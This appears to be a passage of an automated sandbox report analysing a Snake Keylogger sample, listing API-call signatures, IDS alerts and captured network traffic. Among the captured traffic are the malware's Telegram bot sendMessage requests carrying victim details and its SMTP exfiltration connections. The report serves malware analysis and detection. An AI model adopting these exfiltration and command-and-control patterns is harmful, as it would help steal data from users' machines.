Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00E0EF95
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_00E0F0F2
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00E0F3F3
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00E037EF
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E03B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00E03B12
Source: C:\Users\user\Desktop\drRbNknjyb.exe	Code function: 3_2_00E0BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_00E0BCBC
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050445A GetFileAttributesW,FindFirstFileW,FindClose,	6_2_0050445A
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050C6D1 FindFirstFileW,FindClose,	6_2_0050C6D1
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_0050C75C
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0050EF95
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_0050F0F2
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0050F3F3
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_005037EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_005037EF
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_00503B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_00503B12
Source: C:\Users\user\AppData\Local\meshuggenah\acrorrheuma.exe	Code function: 6_2_0050BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_0050BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02ABF45Dh	7_2_02ABF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02ABF45Dh	7_2_02ABF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 02ABFC19h	7_2_02ABF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A3308h	7_2_065A2EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A2D41h	7_2_065A2A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_065A0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AD919h	7_2_065AD670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AD4C1h	7_2_065AD218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A3308h	7_2_065A3236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065ADD71h	7_2_065ADAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A3308h	7_2_065A2EE6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AE621h	7_2_065AE378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A0D0Dh	7_2_065A0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065A16F8h	7_2_065A0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AE1C9h	7_2_065ADF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AEA79h	7_2_065AE7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_065A0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_065A0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AEED1h	7_2_065AEC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AF781h	7_2_065AF4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AF329h	7_2_065AF080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AFBD9h	7_2_065AF930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 065AD069h	7_2_065ACDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 016DF45Dh	10_2_016DF2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 016DF45Dh	10_2_016DF4AC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 016DFC19h	10_2_016DF961
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C73308h	10_2_06C72EF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C72D41h	10_2_06C72A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7DD71h	10_2_06C7DAC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7D919h	10_2_06C7D670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7D4C1h	10_2_06C7D218
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C73308h	10_2_06C73236
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7EA79h	10_2_06C7E7D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7E621h	10_2_06C7E378
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7E1C9h	10_2_06C7DF20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C70D0Dh	10_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C716F8h	10_2_06C70B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7F781h	10_2_06C7F4D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7F329h	10_2_06C7F080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	10_2_06C70040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7EED1h	10_2_06C7EC28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7D069h	10_2_06C7CDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06C7FBD9h	10_2_06C7F930

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49739 -> 208.91.199.225:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49740 -> 208.91.199.225:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49735 -> 208.91.199.225:587
Source: Network traffic	Suricata IDS: 2060048 - Severity 1 - ET MALWARE Snake Keylogger Exfil via SMTP (VIP Recovery) : 192.168.2.5:49732 -> 208.91.199.225:587
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49736 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49725 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.5:49732 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2008/03/2025%20/%2018:24:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:39:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49698 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49712 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49702 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49695 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49697 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49701 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49731 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49722 -> 104.21.48.1:443

Source: global traffic

TCP traffic: 192.168.2.5:49732 -> 208.91.199.225:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49696 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.5:49704 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\drRbNknjyb.exe

Code function: 3_2_00E122EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

3_2_00E122EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2008/03/2025%20/%2018:24:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:813435%0D%0ADate%20and%20Time:%2008/03/2025%20/%2021:39:51%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20813435%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: us2.smtp.mailhostbox.com

